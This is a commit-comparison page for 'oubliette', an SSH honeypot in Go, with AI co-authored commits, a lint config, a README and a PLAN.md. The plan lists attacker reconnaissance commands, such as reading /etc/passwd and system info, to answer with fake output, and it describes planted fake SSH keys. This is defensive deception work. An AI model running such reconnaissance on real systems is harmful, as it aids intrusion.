Compare commits

..

53 Commits

Author SHA1 Message Date
1b28f10ca8 refactor: migrate module path from git.t-juice.club to code.t-juice.club
Update Go module path and all import references to reflect the migration
from Gitea (git.t-juice.club) to Forgejo (code.t-juice.club).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-09 18:51:23 +01:00
664e79fce6 feat: add Prometheus metrics for Store queries
Add InstrumentedStore decorator that wraps any Store and records
per-method query duration histograms and error counters. Wired into
main.go so all storage consumers get automatic observability.

Bump version to 0.18.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-07 22:29:51 +01:00
c74313c195 fix: resolve linting issues in roomba shell
Replace unnecessary fmt.Sprintf calls with string literals, use
slices.Contains instead of manual loop, and use compound assignment
operator.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-07 22:18:25 +01:00
9783ae5865 fix: prevent context canceled errors in web dashboard
Detach DB queries from HTTP request context so HTMX polling doesn't
cancel in-flight queries when the browser aborts previous XHRs. Add
indexes on login_attempts and sessions to speed up frequent dashboard
queries. Bump version to 0.17.1.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-07 22:16:49 +01:00
62de222488 feat: add tetris shell (Tetris game TUI)
Full-screen Tetris game using Bubbletea with title screen, ghost piece,
lock delay, NES-style scoring, configurable difficulty (easy/normal/hard),
and honeypot event logging. Bumps version to 0.17.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-20 00:59:46 +01:00
c9d143d84b feat: add roomba shell (iRobot Roomba j7+ vacuum emulator)
New novelty shell emulating RoombaOS with cleaning, scheduling,
diagnostics, floor map, and humorous history entries. Bump version
to 0.16.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-18 14:06:59 +01:00
d18a904ed5 chore: bump version to 0.15.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-18 09:13:50 +01:00
cb7be28f42 feat: add server-side session filtering with input bytes and human score
Replace client-side session table filtering with server-side filtering
via a new /fragments/recent-sessions htmx endpoint. Add InputBytes column
to session tables, Human score > 0 checkbox filter, and Sort by Input
Bytes option to help identify sessions with actual shell interaction.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-18 09:12:51 +01:00
0908b43724 chore: bump version to 0.14.2
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 15:24:01 +01:00
52310f588d fix: highlight all polygons on hover for multi-path countries
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 15:24:01 +01:00
b52216bd2f chore: bump version to 0.14.1
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 15:21:01 +01:00
2bc83a17dd fix: handle SVG group elements in world map for multi-path countries
The SVG world map uses <g> group elements for countries with complex
shapes (US, CN, RU, GB, etc.), but the JS only queried <path> elements,
causing 36 countries to be missing from the map. Also removes the SVG
<title> element that was overriding the custom tooltip.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 15:20:23 +01:00
faf6e2abd7 docs: mark 4.1 and 4.4 as completed in PLAN.md
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-16 20:34:17 +01:00
0a4eac188a chore: bump version to 0.14.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-16 20:31:53 +01:00
7c90c9ed4a feat: add charts, world map, and filters to web dashboard
Add Chart.js line/bar charts for attack trends (attempts over time,
hourly pattern), an SVG world map choropleth colored by attack origin
country, and a collapsible filter form (date range, IP, country,
username) that narrows both charts and top-N tables.

New store methods: GetAttemptsOverTime, GetHourlyPattern, GetCountryStats,
and filtered variants of dashboard stats/top-N queries. New JSON API
endpoints at /api/charts/* and an htmx fragment at
/fragments/dashboard-content for filtered table updates.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-16 20:27:15 +01:00
8a631af0d2 fix: prevent dashboard top-grid cards from overflowing horizontally
Increase minimum column width from 280px to 380px so the 3-column Top
IPs table fits without clipping. Add overflow/min-width safety net for
narrow viewports.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 21:25:20 +01:00
40fda3420c feat: add psql shell and username-to-shell routing
Add a PostgreSQL psql interactive terminal shell with backslash
meta-commands, SQL statement handling with multi-line buffering, and
canned responses for common queries. Add username-based shell routing
via [shell.username_routes] config (second priority after credential-
specific shell, before random selection). Bump version to 0.13.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 19:58:34 +01:00
c4801e3309 chore: bump version to 0.12.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 19:38:47 +01:00
4f10a8a422 feat: add session indicators and top exec commands to dashboard
Add visual indicators to session tables (replay badge when events exist,
exec badge for exec sessions) and a new "Top Exec Commands" table on the
dashboard. Includes EventCount field on Session, GetTopExecCommands on
Store interface, and truncateCommand template function.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 19:38:10 +01:00
0b44d1c83f docs: detail fake exec output approach in PLAN.md 4.4.1
Regex-based output assembly: scan exec commands for known patterns
and return plausible fake values rather than interpreting shell
pipelines. Waiting on more real-world bot examples before implementing.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 18:01:42 +01:00
0133d956a5 feat: capture SSH exec commands (PLAN.md 4.4)
Bots often send commands via `ssh user@host <command>` (exec request)
rather than requesting an interactive shell. These were previously
rejected silently. Now exec commands are captured, stored on the session
record, and displayed in the web UI session detail page.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 17:43:11 +01:00
3c20e854aa docs: add plan for capturing SSH exec commands (PLAN.md 4.4)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 17:25:52 +01:00
090dbec390 chore: bump version to 0.10.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 15:55:10 +01:00
df860b3061 feat: add new Prometheus metrics and bearer token auth for /metrics
Add 6 new Prometheus metrics for richer observability:
- auth_attempts_by_country_total (counter by country)
- commands_executed_total (counter by shell via OnCommand callback)
- human_score (histogram of final detection scores)
- storage_login_attempts_total, storage_unique_ips, storage_sessions_total
  (gauges via custom collector querying GetDashboardStats on each scrape)

Add optional bearer token authentication for the /metrics endpoint via
web.metrics_token config option. Uses crypto/subtle.ConstantTimeCompare.
Empty token (default) means no auth for backwards compatibility.

Also adds "cisco" to pre-initialized session/command metric labels.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 15:54:29 +01:00
9aecc7ce02 chore: bump version to 0.9.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 15:29:37 +01:00
94f1f1c266 feat: add GeoIP country lookup with embedded DB-IP Lite database (PLAN.md 4.3)
Embeds a DB-IP Lite country MMDB (~5MB) in the binary via go:embed,
keeping the single-binary deployment story clean. Country codes are
stored alongside login attempts and sessions, shown in the dashboard
(Top IPs, Top Countries card, Recent/Active Sessions, session detail).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 15:27:46 +01:00
8fff893d25 docs: mark Cisco IOS shell (PLAN.md 3.2) as completed
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 15:04:51 +01:00
5ba62afec3 feat: add Cisco IOS shell with mode state machine and abbreviation matching (PLAN.md 3.2)
Implements a Cisco IOS CLI emulator with four modes (user exec, privileged exec,
global config, interface config), Cisco-style command abbreviation (e.g. sh run,
conf t), enable password flow, and realistic show command output including
running-config, interfaces, IP routes, and VLANs.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 14:58:26 +01:00
058da51f86 fix: add column whitelist to queryTopN to prevent SQL injection
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 10:08:28 +01:00
adfe372d13 refactor: extract changePinModel into its own sub-model
The Change PIN screen was the only screen with its state (pinInput,
pinStage, pinMessage) stored directly on the top-level model. Extract
it into a changePinModel in screen_changepin.go to match the pattern
used by all other screens.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 09:34:56 +01:00
3163ea47dc chore: add bubbletea skill 2026-02-15 09:28:28 +01:00
ab07e6a8dc feat: add Prometheus metrics endpoint and Docker image (PLAN.md 4.2)
Add internal/metrics package with dedicated Prometheus registry exposing
SSH connection, auth attempt, session, and build info metrics. Wire into
SSH server (4 instrumentation points) and web server (/metrics endpoint).
Add dockerImage output to flake.nix via dockerTools.buildLayeredImage.
Bump version to 0.7.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 05:47:16 +01:00
b8fcbc7e10 chore: bump version to 0.6.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 05:17:57 +01:00
aa569aac16 feat: add text adventure shell (PLAN.md 3.4)
Zork-style dungeon crawler set in an abandoned data center / medieval dungeon.
11 rooms, 6 items, 3 puzzles (dark room, locked door, maintenance panel),
standard text adventure parser with verb aliases and direction shortcuts.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 05:13:03 +01:00
1a407ad4c2 docs: mark banking TUI shell as complete in PLAN.md
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 00:58:20 +01:00
5d0c8cc20c fix: apply black background to banking TUI padding areas
Padding spaces (end-of-line and blank filler lines) were unstyled,
causing the terminal's default background to bleed through.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 00:55:33 +01:00
d226c32b9b fix: banking shell screen rendering artifacts and transfer panic
Fix rendering issues where content from previous screens bled through
when switching between views of different heights/widths:

- Pad every line to full terminal width (ANSI-aware) so shorter lines
  overwrite leftover content from previous renders
- Track terminal height via WindowSizeMsg and pad between content and
  footer to fill the screen
- Send tea.ClearScreen on all screen transitions for height changes
- Fix panic in transfer completion when routing number is < 4 chars

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 00:50:34 +01:00
86786c9d05 fix: clean up stale active sessions on startup
After an unclean shutdown, sessions could be left with disconnected_at
NULL, appearing permanently active. Add CloseActiveSessions to the Store
interface and call it at startup to close any leftover sessions.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-15 00:16:48 +01:00
d78d461236 chore: bump version to 0.5.0 and update vendor hash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 23:22:28 +01:00
49425635ce revert: undo premature version bump
Version should be bumped when merging to master, not on the feature branch.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 23:17:30 +01:00
8ff029fcb7 feat: add Banking TUI shell using bubbletea
Add an 80s-style green-on-black bank terminal shell ("banking") using
charmbracelet/bubbletea for full-screen TUI rendering over SSH.

Screens: login, main menu, account summary, account detail with
transactions, wire transfer wizard (6-step form capturing routing
number, destination, beneficiary, amount, memo, auth code), transaction
history with pagination, secure messages with breadcrumb content (fake
internal IPs, vault codes), change PIN, and hidden admin access (99)
that locks after 3 failed attempts with COBOL-style error output.

All key actions (login, navigation, wire transfers, admin attempts) are
logged to the session store. Wire transfer data is the honeypot gold.

Configurable via [shell.banking] in TOML: bank_name, terminal_id, region.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 23:17:12 +01:00
462c44ce89 chore: bump version to 0.4.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:43:41 +01:00
47159b9964 fix: convert fridge banner newlines to \r\n for terminal display
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:43:00 +01:00
8e90f21d91 feat: add Smart Fridge shell and per-credential shell routing
Implement Samsung FridgeOS-themed shell (PLAN.md §3.3) with inventory
management, temperature controls, diagnostics, alerts, and other
appliance commands. Add per-credential shell routing so static
credentials can specify which shell to use via the `shell` config field,
passed through ssh.Permissions.Extensions.

Also extract shared ReadLine helper from bash to the shell package so
both shells can reuse terminal input handling.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:34:29 +01:00
84c6912435 docs: mark phase 2.3 session replay as completed
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:11:58 +01:00
541b0df007 chore: bump version to 0.3.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:10:26 +01:00
24c166b86b feat: add session replay with terminal playback via xterm.js
Persist byte-level I/O events from SSH sessions to SQLite and add a web
UI to replay them with original timing. Events are buffered in memory
and flushed every 2s to avoid blocking SSH I/O on database writes.

- Add session_events table (migration 002)
- Add SessionEvent type and storage methods (SQLite + MemoryStore)
- Change RecordingChannel to support multiple callbacks
- Add EventRecorder for buffered event persistence
- Add session detail page with xterm.js terminal replay
- Add /api/sessions/{id}/events JSON endpoint
- Linkify session IDs in dashboard and active sessions
- Vendor xterm.js v5.3.0

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 22:09:24 +01:00
d4380c0aea chore: add golangci-lint config and fix all lint issues
Enable 15 additional linters (gosec, errorlint, gocritic, modernize,
misspell, bodyclose, sqlclosecheck, nilerr, unconvert, durationcheck,
sloglint, wastedassign, usestdlibvars) with sensible exclusion rules.

Fix all findings: errors.Is for error comparisons, run() pattern in
main to avoid exitAfterDefer, ReadHeaderTimeout for Slowloris
protection, bounds check in escape sequence reader, WaitGroup.Go,
slices.Contains, range-over-int loops, and http.MethodGet constants.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 21:43:49 +01:00
0ad6f4cb6a feat: add human detection scoring and webhook notifications
Implement phase 2.1 (human detection) and 2.2 (notifications):

- Detection scorer computes 0.0-1.0 human likelihood from keystroke
  timing variance, special key usage, typing speed, command diversity,
  and session duration
- Webhook notifier sends JSON POST to configured endpoints with
  deduplication, custom headers, and event filtering
- RecordingChannel gains an event callback for feeding keystrokes
  to the scorer without coupling shell and detection packages
- Server wires scorer into session lifecycle with periodic updates
  and threshold-based notification triggers
- Web UI shows human score in session tables with highlighting
- New config sections: [detection] and [[notify.webhooks]]

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 21:28:11 +01:00
96c8476f77 feat: add minimal web dashboard with stats, top credentials, and sessions
Implements Phase 1.5 — an embedded web UI using Go templates, Pico CSS
(dark theme), and htmx for auto-refreshing stats and active sessions.

Adds read query methods to the Store interface (GetDashboardStats,
GetTopUsernames, GetTopPasswords, GetTopIPs, GetRecentSessions) with
implementations for both SQLite and MemoryStore. Introduces the
internal/web package with server, handlers, templates, and tests.
Web server is opt-in via [web] config section and runs alongside
SSH with graceful shutdown. Bumps version to 0.2.0.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 20:59:12 +01:00
85e79c97ac docs: mark phase 1.4 as complete in PLAN.md
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 20:34:28 +01:00
535e9eef4f chore: add sqlite to dev shell
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 20:32:18 +01:00
8189a108d1 feat: add shell interface, registry, and bash shell emulator
Implement Phase 1.4: replaces the hardcoded banner/timeout stub with a
proper shell system. Adds a Shell interface with weighted registry for
shell selection, a RecordingChannel wrapper (pass-through for now, prep
for Phase 2.3 replay), and a bash-like shell with fake filesystem,
terminal line reader, and command handling (pwd, ls, cd, cat, whoami,
hostname, id, uname, exit). Sessions now log command/output pairs to
the store and record the shell name.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 20:24:48 +01:00
105 changed files with 17624 additions and 136 deletions

View File

@@ -0,0 +1,55 @@
---
name: bubbletea
description: Browse Bubbletea TUI framework documentation and examples. Use when working with Bubbletea components, models, commands, or building terminal user interfaces in Go.
---
# Bubbletea Documentation
Bubbletea is a Go framework for building terminal user interfaces based on The Elm Architecture.
## Key Resources
When you need to understand Bubbletea patterns or find examples:
1. **Examples README** - Overview of all available examples:
https://github.com/charmbracelet/bubbletea/blob/main/examples/README.md
2. **Examples Directory** - Full source code for all examples:
https://github.com/charmbracelet/bubbletea/tree/main/examples
## How to Use
1. First, fetch the examples README to get an overview of available examples:
```
WebFetch https://github.com/charmbracelet/bubbletea/blob/main/examples/README.md
```
2. Once you identify a relevant example, fetch its source code from the examples directory.
## Common Examples to Reference
- `list` - List component with filtering
- `table` - Table component
- `textinput` - Text input handling
- `textarea` - Multi-line text input
- `viewport` - Scrollable content
- `paginator` - Pagination
- `spinner` - Loading spinners
- `progress` - Progress bars
- `tabs` - Tab navigation
- `help` - Help text/keybindings display
## Core Concepts
- **Model**: Application state
- **Update**: Handles messages and returns updated model + commands
- **View**: Renders the model to a string
- **Cmd**: Side effects that produce messages
- **Msg**: Events that trigger updates
## Related Charm Libraries
- **Bubbles**: Pre-built components (github.com/charmbracelet/bubbles)
- **Lipgloss**: Styling and layout (github.com/charmbracelet/lipgloss)
- **Glamour**: Markdown rendering (github.com/charmbracelet/glamour)

2
.gitignore vendored
View File

@@ -4,3 +4,5 @@ oubliette.toml
*.db-wal *.db-wal
*.db-shm *.db-shm
/oubliette /oubliette
*.mmdb
*.mmdb.gz

79
.golangci.yml Normal file
View File

@@ -0,0 +1,79 @@
version: "2"
linters:
enable:
# Bug detectors.
- bodyclose
- durationcheck
- errorlint
- gocritic
- nilerr
- sqlclosecheck
# Security.
- gosec
# Style and modernization.
- misspell
- modernize
- unconvert
- usestdlibvars
# Logging.
- sloglint
# Dead code.
- wastedassign
settings:
errcheck:
exclude-functions:
# Terminal I/O writes (honeypot shell output).
- fmt.Fprint
- fmt.Fprintf
# Low-level byte I/O in shell readLine (escape sequences, echo).
- (io.ReadWriter).Read
- (io.ReadWriter).Write
- (io.ReadWriteCloser).Read
- (io.ReadWriteCloser).Write
- (io.Reader).Read
- (io.Writer).Write
gosec:
excludes:
# File reads from config paths — expected in a CLI tool.
- G304
# Weak RNG for shell selection — crypto/rand not needed.
- G404
exclusions:
rules:
# Ignore unchecked Close() — standard resource cleanup.
- linters: [errcheck]
text: "Error return value of .+\\.Close.+ is not checked"
# Ignore unchecked Rollback() — called in error paths before returning.
- linters: [errcheck]
text: "Error return value of .+\\.Rollback.+ is not checked"
# Ignore unchecked Reply/Reject — SSH protocol; nothing useful on failure.
- linters: [errcheck]
text: "Error return value of .+\\.(Reply|Reject).+ is not checked"
# Test files: allow unchecked errors.
- linters: [errcheck]
path: "_test\\.go"
# Test files: InsecureIgnoreHostKey, file permissions, unhandled errors are expected.
- linters: [gosec]
path: "_test\\.go"
# Unhandled errors for cleanup/protocol ops — mirrors errcheck exclusions.
- linters: [gosec]
text: "G104"
source: "\\.(Close|Rollback|Reject|Reply|Read|Write)\\("
# SQL with safe column interpolation from a fixed switch — not user input.
- linters: [gosec]
text: "G201"
path: "internal/storage/"

101
PLAN.md
View File

@@ -74,7 +74,7 @@ Goal: A working SSH honeypot that logs attempts, stores them in SQLite, and can
- Retention policy: background goroutine that prunes old records on a schedule - Retention policy: background goroutine that prunes old records on a schedule
- **Database migrations:** Version-tracked migrations using embedded SQL files. Store current schema version in a `schema_version` table, apply pending migrations on startup. Keep it simple - no external migration tool, just sequential numbered `.sql` files embedded in the binary. - **Database migrations:** Version-tracked migrations using embedded SQL files. Store current schema version in a `schema_version` table, apply pending migrations on startup. Keep it simple - no external migration tool, just sequential numbered `.sql` files embedded in the binary.
### 1.4 Shell Interface & Registry ### 1.4 Shell Interface & Registry
- Shell interface definition - Shell interface definition
- Registry with weighted random selection - Registry with weighted random selection
- Basic bash-like shell: - Basic bash-like shell:
@@ -105,7 +105,7 @@ This lets shells build realistic prompts (`username@hostname:~$`) and log activi
- This ensures consistent, complete capture regardless of shell implementation, and avoids needing to refactor shells when session replay is added in Phase 2.3 - This ensures consistent, complete capture regardless of shell implementation, and avoids needing to refactor shells when session replay is added in Phase 2.3
- The current `session_logs` schema (input/output text pairs) may need a companion `session_keystrokes` table with `(session_id, timestamp, direction, data)` for byte-level replay fidelity — evaluate when implementing - The current `session_logs` schema (input/output text pairs) may need a companion `session_keystrokes` table with `(session_id, timestamp, direction, data)` for byte-level replay fidelity — evaluate when implementing
### 1.5 Minimal Web UI ### 1.5 Minimal Web UI
- Embedded static assets (Go embed) - Embedded static assets (Go embed)
- Dashboard: total attempts, attempts over time, unique IPs - Dashboard: total attempts, attempts over time, unique IPs
- Tables: top usernames, top passwords, top source IPs - Tables: top usernames, top passwords, top source IPs
@@ -117,19 +117,19 @@ This lets shells build realistic prompts (`username@hostname:~$`) and log activi
Goal: Detect likely-human sessions and make the system smarter. Goal: Detect likely-human sessions and make the system smarter.
### 2.1 Human Detection Scoring ### 2.1 Human Detection Scoring
- Keystroke timing analysis - Keystroke timing analysis
- Track backspace, tab, arrow key usage - Track backspace, tab, arrow key usage
- Command diversity scoring - Command diversity scoring
- Compute per-session human score, store in sessions table - Compute per-session human score, store in sessions table
- Flag sessions above configurable threshold - Flag sessions above configurable threshold
### 2.2 Notifications ### 2.2 Notifications
- Webhook support (generic HTTP POST, works with Slack/Discord/ntfy) - Webhook support (generic HTTP POST, works with Slack/Discord/ntfy)
- Trigger on: human score threshold crossed, new session started, configurable - Trigger on: human score threshold crossed, new session started, configurable
- Include session details in payload - Include session details in payload
### 2.3 Session Replay ### 2.3 Session Replay
- Store keystroke-by-keystroke data with timing information - Store keystroke-by-keystroke data with timing information
- Web UI: replay a session in a terminal-like viewer, watching commands play back in real-time - Web UI: replay a session in a terminal-like viewer, watching commands play back in real-time
- Filter/sort sessions by human score - Filter/sort sessions by human score
@@ -150,26 +150,41 @@ Goal: Add the entertaining shell implementations.
- **Haunted:** commands gradually return stranger output, files appear/disappear, `whoami` returns different users - **Haunted:** commands gradually return stranger output, files appear/disappear, `whoami` returns different users
- **Bread crumbs:** fake .bash_history, id_rsa files, database configs pointing to other honeypots - **Bread crumbs:** fake .bash_history, id_rsa files, database configs pointing to other honeypots
### 3.2 Cisco IOS Shell ### 3.2 Cisco IOS Shell
- Realistic `>` and `#` prompts - Realistic `>` and `#` prompts
- Common commands: `show running-config`, `show interfaces`, `enable`, `configure terminal` - Common commands: `show running-config`, `show interfaces`, `enable`, `configure terminal`
- Fake device info that looks like a real router - Fake device info that looks like a real router
### 3.3 Smart Fridge Shell ### 3.3 Smart Fridge Shell
- Samsung FridgeOS boot banner - Samsung FridgeOS boot banner
- Inventory management commands - Inventory management commands
- Temperature warnings - Temperature warnings
- "WARNING: milk expires in 2 days" - "WARNING: milk expires in 2 days"
- Easter eggs - Per-credential shell routing via `shell` field in static credentials
### 3.4 Text Adventure ### 3.4 Text Adventure
- Zork-style dungeon crawler - Zork-style dungeon crawler
- "You are in a dimly lit server room." - "You are in a dimly lit server room."
- Navigation, items, puzzles - Navigation, items, puzzles
- The dungeon is the oubliette itself - The dungeon is the oubliette itself
### 3.5 Other Shell Ideas (Future) ### 3.5 Banking TUI Shell ✅
- **Banking TUI:** 80s-style green-on-black bank terminal - 80s-style green-on-black bank terminal
### 3.6 PostgreSQL psql Shell ✅
- Simulates psql interactive terminal with `db_name` and `pg_version` config
- Backslash meta-commands: `\q`, `\dt`, `\d <table>`, `\l`, `\du`, `\conninfo`, `\?`, `\h`
- SQL statement handling with multi-line buffering (semicolon-terminated)
- Canned responses for common queries (SELECT version(), current_database(), etc.)
- DDL/DML acknowledgments (CREATE TABLE, INSERT, UPDATE, DELETE, etc.)
- Username-to-shell routing: configurable `[shell.username_routes]` maps usernames to shells
### 3.7 Roomba Shell ✅
- iRobot Roomba j7+ vacuum robot interface
- Status, cleaning, scheduling, diagnostics, floor map
- Humorous history entries (cat encounters, sock tangles, sticky substances)
### 3.8 Other Shell Ideas (Future)
- **Nuclear launch terminal:** "ENTER LAUNCH AUTHORIZATION CODE" - **Nuclear launch terminal:** "ENTER LAUNCH AUTHORIZATION CODE"
- **ELIZA therapist:** every response is a therapy question - **ELIZA therapist:** every response is a therapy question
- **Pizza ordering terminal:** "Welcome to PizzaNet v2.3" - **Pizza ordering terminal:** "Welcome to PizzaNet v2.3"
@@ -181,19 +196,55 @@ Goal: Add the entertaining shell implementations.
Goal: Make the web UI great and add operational niceties. Goal: Make the web UI great and add operational niceties.
### 4.1 Enhanced Web UI ### 4.1 Enhanced Web UI
- GeoIP lookups and world map visualization of attack sources - GeoIP lookups and world map visualization of attack sources
- Charts: attempts over time, hourly patterns, credential trends - Charts: attempts over time, hourly patterns, credential trends
- Session detail view with full command log - Session detail view with full command log
- Filtering and search - Filtering and search
### 4.2 Operational ### 4.2 Operational
- Prometheus metrics endpoint - Prometheus metrics endpoint
- Structured logging (slog) - Structured logging (slog)
- Graceful shutdown - Graceful shutdown
- Systemd unit file / deployment docs - Docker image (nix dockerTools) ✅
- Systemd unit file / deployment docs ✅
### 4.3 GeoIP ### 4.3 GeoIP
- Embed a lightweight GeoIP database or use an API - Embed a lightweight GeoIP database or use an API
- Store country/city with each attempt - Store country/city with each attempt
- Aggregate stats by country - Aggregate stats by country
### 4.4 Capture SSH Exec Commands ✅
Many bots send a command directly via `ssh user@host <command>` (an SSH "exec" request) rather than requesting an interactive shell. Currently these are rejected and the command is lost. We should capture them.
- Handle `"exec"` request type in the server's request loop (alongside `"pty-req"` and `"shell"`) ✅
- Parse the command string from the exec payload ✅
- Add an `exec_command` column (nullable) to the `sessions` table via a new migration ✅
- Store the command on the session record before closing the channel ✅
- Optionally return plausible fake output for common commands (e.g. `uname`, `id`, `cat /etc/passwd`) to encourage further interaction
- Surface exec commands in the web UI (session detail view) ✅
#### 4.4.1 Fake Exec Output
Return plausible fake output for exec commands to encourage bots to interact further.
**Approach: regex-based output assembly.** Bots typically send a single long command that chains recon commands and then echoes a summary (e.g. `echo "UNAME:$uname"`). Rather than interpreting arbitrary shell pipelines, we scan the command string for known patterns and assemble fake output.
Implementation:
- A map of common command/variable patterns to fake output strings, e.g.:
- `uname -a` / `uname -s -v -n -m``"Linux ubuntu-server 5.15.0-91-generic #101-Ubuntu SMP Tue Jan 2 15:13:10 UTC 2024 x86_64"`
- `uname -m` / `arch``"x86_64"`
- `cat /proc/uptime``"86432.71 172801.55"`
- `nproc` / `grep -c "^processor" /proc/cpuinfo``"2"`
- `cat /proc/cpuinfo` → fake cpuinfo block
- `lspci` → empty (no GPU — discourages cryptominer targeting)
- `id``"uid=0(root) gid=0(root) groups=0(root)"`
- `cat /etc/passwd` → minimal fake passwd file
- `last` → fake login entries
- `cat --help`, `ls --help` → canned GNU coreutils help text
- Scan the exec command for `echo "KEY:$var"` patterns; for each key, look up the corresponding fake value from the variable assignment earlier in the command
- If we recognise echo patterns, assemble and return the expected output
- If we don't recognise the command at all, return empty output with exit 0 (current behaviour)
- Values should draw from the existing shell config where possible (hostname, fake_user) for consistency
- New package `internal/execfake` or a file in `internal/server/` — keep it simple
Gather more real-world bot examples before implementing to ensure good coverage of common recon patterns.

View File

@@ -33,10 +33,31 @@ Key settings:
- `ssh.host_key_path` — Ed25519 host key, auto-generated if missing - `ssh.host_key_path` — Ed25519 host key, auto-generated if missing
- `auth.accept_after` — accept login after N failures per IP (default `10`) - `auth.accept_after` — accept login after N failures per IP (default `10`)
- `auth.credential_ttl` — how long to remember accepted credentials (default `24h`) - `auth.credential_ttl` — how long to remember accepted credentials (default `24h`)
- `auth.static_credentials` — always-accepted username/password pairs - `auth.static_credentials` — always-accepted username/password pairs (optional `shell` field routes to a specific shell)
- Available shells: `bash` (fake Linux shell), `fridge` (Samsung Smart Fridge OS), `banking` (80s-style bank terminal TUI), `adventure` (Zork-style text adventure dungeon), `cisco` (Cisco IOS CLI with mode state machine and command abbreviation), `psql` (PostgreSQL psql interactive terminal), `roomba` (iRobot Roomba vacuum robot), `tetris` (Tetris game TUI)
- `shell.username_routes` — map usernames to specific shells (e.g. `postgres = "psql"`); credential-specific shell overrides take priority
- `storage.db_path` — SQLite database path (default `oubliette.db`) - `storage.db_path` — SQLite database path (default `oubliette.db`)
- `storage.retention_days` — auto-prune records older than N days (default `90`) - `storage.retention_days` — auto-prune records older than N days (default `90`)
- `storage.retention_interval` — how often to run retention (default `1h`) - `storage.retention_interval` — how often to run retention (default `1h`)
- `shell.hostname` — hostname shown in shell prompts (default `ubuntu-server`)
- `shell.banner` — banner displayed on connection
- `shell.fake_user` — override username in prompt; empty uses the authenticated user
- `web.enabled` — enable the web dashboard (default `false`)
- `web.listen_addr` — web dashboard listen address (default `:8080`)
- Dashboard includes Chart.js charts (attempts over time, hourly pattern), an SVG world map choropleth colored by attack origin, and filter controls for date range / IP / country / username
- Session detail pages at `/sessions/{id}` include terminal replay via xterm.js
- `web.metrics_enabled` — expose Prometheus metrics at `/metrics` (default `true`)
- `web.metrics_token` — bearer token to protect `/metrics`; empty means no auth (default empty)
- `detection.enabled` — enable human detection scoring (default `false`)
- `detection.threshold` — score threshold (0.01.0) for flagging sessions (default `0.6`)
- `detection.update_interval` — how often to recompute scores (default `5s`)
- `notify.webhooks` — list of webhook endpoints for notifications (see example config)
### GeoIP
Country-level GeoIP lookups are embedded in the binary using the [DB-IP Lite](https://db-ip.com/db/lite.php) database (CC-BY-4.0). The dashboard shows country alongside IPs and includes a "Top Countries" table.
For local development, run `scripts/fetch-geoip.sh` to download the MMDB file. The Nix build fetches it automatically.
### Run ### Run
@@ -50,6 +71,9 @@ Test with:
ssh -o StrictHostKeyChecking=no -p 2222 root@localhost ssh -o StrictHostKeyChecking=no -p 2222 root@localhost
``` ```
SSH exec commands (`ssh user@host <command>`) are also captured and stored on the session record.
### NixOS Module ### NixOS Module
